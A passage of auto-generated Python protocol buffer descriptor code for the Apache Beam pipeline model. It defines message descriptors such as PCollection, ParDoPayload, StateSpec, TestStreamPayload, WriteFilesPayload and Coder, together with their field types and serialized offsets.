options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1888,
serialized_end=3632,
)
_STANDARDSIDEINPUTTYPES = _descriptor.Descriptor(
name='StandardSideInputTypes',
full_name='org.apache.beam.model.pipeline.v1.StandardSideInputTypes',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_STANDARDSIDEINPUTTYPES_ENUM,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3635,
serialized_end=3765,
)
_PCOLLECTION = _descriptor.Descriptor(
name='PCollection',
full_name='org.apache.beam.model.pipeline.v1.PCollection',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='unique_name', full_name='org.apache.beam.model.pipeline.v1.PCollection.unique_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='coder_id', full_name='org.apache.beam.model.pipeline.v1.PCollection.coder_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='is_bounded', full_name='org.apache.beam.model.pipeline.v1.PCollection.is_bounded', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='windowing_strategy_id', full_name='org.apache.beam.model.pipeline.v1.PCollection.windowing_strategy_id', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='display_data', full_name='org.apache.beam.model.pipeline.v1.PCollection.display_data', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3768,
serialized_end=3992,
)
_PARDOPAYLOAD_SIDEINPUTSENTRY = _descriptor.Descriptor(
name='SideInputsEntry',
full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.SideInputsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.SideInputsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.SideInputsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4483,
serialized_end=4578,
)
_PARDOPAYLOAD_STATESPECSENTRY = _descriptor.Descriptor(
name='StateSpecsEntry',
full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.StateSpecsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.StateSpecsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.StateSpecsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4580,
serialized_end=4675,
)
_PARDOPAYLOAD_TIMERSPECSENTRY = _descriptor.Descriptor(
name='TimerSpecsEntry',
full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.TimerSpecsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.TimerSpecsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.TimerSpecsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4677,
serialized_end=4772,
)
_PARDOPAYLOAD = _descriptor.Descriptor(
name='ParDoPayload',
full_name='org.apache.beam.model.pipeline.v1.ParDoPayload',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='do_fn', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.do_fn', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='parameters', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.parameters', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='side_inputs', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.side_inputs', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='state_specs', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.state_specs', index=3,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='timer_specs', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.timer_specs', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='splittable', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.splittable', index=5,
number=6, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='restriction_coder_id', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.restriction_coder_id', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='requests_finalization', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.requests_finalization', index=7,
number=8, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_PARDOPAYLOAD_SIDEINPUTSENTRY, _PARDOPAYLOAD_STATESPECSENTRY, _PARDOPAYLOAD_TIMERSPECSENTRY, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3995,
serialized_end=4772,
)
_PARAMETER_TYPE = _descriptor.Descriptor(
name='Type',
full_name='org.apache.beam.model.pipeline.v1.Parameter.Type',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_PARAMETER_TYPE_ENUM,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4858,
serialized_end=4948,
)
_PARAMETER = _descriptor.Descriptor(
name='Parameter',
full_name='org.apache.beam.model.pipeline.v1.Parameter',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='org.apache.beam.model.pipeline.v1.Parameter.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_PARAMETER_TYPE, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4775,
serialized_end=4948,
)
_STATESPEC = _descriptor.Descriptor(
name='StateSpec',
full_name='org.apache.beam.model.pipeline.v1.StateSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='value_spec', full_name='org.apache.beam.model.pipeline.v1.StateSpec.value_spec', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='bag_spec', full_name='org.apache.beam.model.pipeline.v1.StateSpec.bag_spec', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='combining_spec', full_name='org.apache.beam.model.pipeline.v1.StateSpec.combining_spec', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='map_spec', full_name='org.apache.beam.model.pipeline.v1.StateSpec.map_spec', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='set_spec', full_name='org.apache.beam.model.pipeline.v1.StateSpec.set_spec', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='spec', full_name='org.apache.beam.model.pipeline.v1.StateSpec.spec',
index=0, containing_type=None, fields=[]),
],
serialized_start=4951,
serialized_end=5331,
)
_VALUESTATESPEC = _descriptor.Descriptor(
name='ValueStateSpec',
full_name='org.apache.beam.model.pipeline.v1.ValueStateSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='coder_id', full_name='org.apache.beam.model.pipeline.v1.ValueStateSpec.coder_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5333,
serialized_end=5367,
)
_BAGSTATESPEC = _descriptor.Descriptor(
name='BagStateSpec',
full_name='org.apache.beam.model.pipeline.v1.BagStateSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='element_coder_id', full_name='org.apache.beam.model.pipeline.v1.BagStateSpec.element_coder_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5369,
serialized_end=5409,
)
_COMBININGSTATESPEC = _descriptor.Descriptor(
name='CombiningStateSpec',
full_name='org.apache.beam.model.pipeline.v1.CombiningStateSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='accumulator_coder_id', full_name='org.apache.beam.model.pipeline.v1.CombiningStateSpec.accumulator_coder_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='combine_fn', full_name='org.apache.beam.model.pipeline.v1.CombiningStateSpec.combine_fn', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5411,
serialized_end=5533,
)
_MAPSTATESPEC = _descriptor.Descriptor(
name='MapStateSpec',
full_name='org.apache.beam.model.pipeline.v1.MapStateSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key_coder_id', full_name='org.apache.beam.model.pipeline.v1.MapStateSpec.key_coder_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value_coder_id', full_name='org.apache.beam.model.pipeline.v1.MapStateSpec.value_coder_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5535,
serialized_end=5595,
)
_SETSTATESPEC = _descriptor.Descriptor(
name='SetStateSpec',
full_name='org.apache.beam.model.pipeline.v1.SetStateSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='element_coder_id', full_name='org.apache.beam.model.pipeline.v1.SetStateSpec.element_coder_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5597,
serialized_end=5637,
)
_TIMERSPEC = _descriptor.Descriptor(
name='TimerSpec',
full_name='org.apache.beam.model.pipeline.v1.TimerSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='time_domain', full_name='org.apache.beam.model.pipeline.v1.TimerSpec.time_domain', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='timer_coder_id', full_name='org.apache.beam.model.pipeline.v1.TimerSpec.timer_coder_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5639,
serialized_end=5747,
)
_ISBOUNDED = _descriptor.Descriptor(
name='IsBounded',
full_name='org.apache.beam.model.pipeline.v1.IsBounded',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_ISBOUNDED_ENUM,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5749,
serialized_end=5813,
)
_READPAYLOAD = _descriptor.Descriptor(
name='ReadPayload',
full_name='org.apache.beam.model.pipeline.v1.ReadPayload',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='source', full_name='org.apache.beam.model.pipeline.v1.ReadPayload.source', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='is_bounded', full_name='org.apache.beam.model.pipeline.v1.ReadPayload.is_bounded', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5816,
serialized_end=5968,
)
_WINDOWINTOPAYLOAD = _descriptor.Descriptor(
name='WindowIntoPayload',
full_name='org.apache.beam.model.pipeline.v1.WindowIntoPayload',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='window_fn', full_name='org.apache.beam.model.pipeline.v1.WindowIntoPayload.window_fn', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5970,
serialized_end=6060,
)
_COMBINEPAYLOAD = _descriptor.Descriptor(
name='CombinePayload',
full_name='org.apache.beam.model.pipeline.v1.CombinePayload',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='combine_fn', full_name='org.apache.beam.model.pipeline.v1.CombinePayload.combine_fn', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='accumulator_coder_id', full_name='org.apache.beam.model.pipeline.v1.CombinePayload.accumulator_coder_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6062,
serialized_end=6180,
)
_TESTSTREAMPAYLOAD_EVENT_ADVANCEWATERMARK = _descriptor.Descriptor(
name='AdvanceWatermark',
full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AdvanceWatermark',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='new_watermark', full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AdvanceWatermark.new_watermark', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6624,
serialized_end=6665,
)
_TESTSTREAMPAYLOAD_EVENT_ADVANCEPROCESSINGTIME = _descriptor.Descriptor(
name='AdvanceProcessingTime',
full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AdvanceProcessingTime',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='advance_duration', full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AdvanceProcessingTime.advance_duration', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6667,
serialized_end=6716,
)
_TESTSTREAMPAYLOAD_EVENT_ADDELEMENTS = _descriptor.Descriptor(
name='AddElements',
full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AddElements',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='elements', full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AddElements.elements', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6718,
serialized_end=6822,
)
_TESTSTREAMPAYLOAD_EVENT = _descriptor.Descriptor(
name='Event',
full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.Event',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='watermark_event', full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.watermark_event', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='processing_time_event', full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.processing_time_event', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='element_event', full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.element_event', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_TESTSTREAMPAYLOAD_EVENT_ADVANCEWATERMARK, _TESTSTREAMPAYLOAD_EVENT_ADVANCEPROCESSINGTIME, _TESTSTREAMPAYLOAD_EVENT_ADDELEMENTS, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='event', full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.event',
index=0, containing_type=None, fields=[]),
],
serialized_start=6299,
serialized_end=6831,
)
_TESTSTREAMPAYLOAD_TIMESTAMPEDELEMENT = _descriptor.Descriptor(
name='TimestampedElement',
full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.TimestampedElement',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='encoded_element', full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.TimestampedElement.encoded_element', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='timestamp', full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.TimestampedElement.timestamp', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6833,
serialized_end=6897,
)
_TESTSTREAMPAYLOAD = _descriptor.Descriptor(
name='TestStreamPayload',
full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='coder_id', full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.coder_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='events', full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.events', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_TESTSTREAMPAYLOAD_EVENT, _TESTSTREAMPAYLOAD_TIMESTAMPEDELEMENT, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6183,
serialized_end=6897,
)
_WRITEFILESPAYLOAD_SIDEINPUTSENTRY = _descriptor.Descriptor(
name='SideInputsEntry',
full_name='org.apache.beam.model.pipeline.v1.WriteFilesPayload.SideInputsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.WriteFilesPayload.SideInputsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.WriteFilesPayload.SideInputsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4483,
serialized_end=4578,
)
_WRITEFILESPAYLOAD = _descriptor.Descriptor(
name='WriteFilesPayload',
full_name='org.apache.beam.model.pipeline.v1.WriteFilesPayload',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='sink', full_name='org.apache.beam.model.pipeline.v1.WriteFilesPayload.sink', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='format_function', full_name='org.apache.beam.model.pipeline.v1.WriteFilesPayload.format_function', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='windowed_writes', full_name='org.apache.beam.model.pipeline.v1.WriteFilesPayload.windowed_writes', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='runner_determined_sharding', full_name='org.apache.beam.model.pipeline.v1.WriteFilesPayload.runner_determined_sharding', index=3,
number=4, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='side_inputs', full_name='org.apache.beam.model.pipeline.v1.WriteFilesPayload.side_inputs', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_WRITEFILESPAYLOAD_SIDEINPUTSENTRY, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6900,
serialized_end=7311,
)
_CODER = _descriptor.Descriptor(
name='Coder',
full_name='org.apache.beam.model.pipeline.v1.Coder',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='spec', full_name='org.apache.beam.model.pipeline.v1.Coder.spec', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='component_coder_ids', full_name='org.apache.beam.model.pipeline.v1.Coder.component_coder_ids', index=1,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7313,
serialized_end=7415,
)
_STANDARDCODERS = _descriptor.Descriptor(
name='StandardCoders',
full_name='org.apache.beam.model.pipeline.v1.StandardCoders',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_STANDARDCODERS_ENUM,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7418,
serialized_end=7857,
)
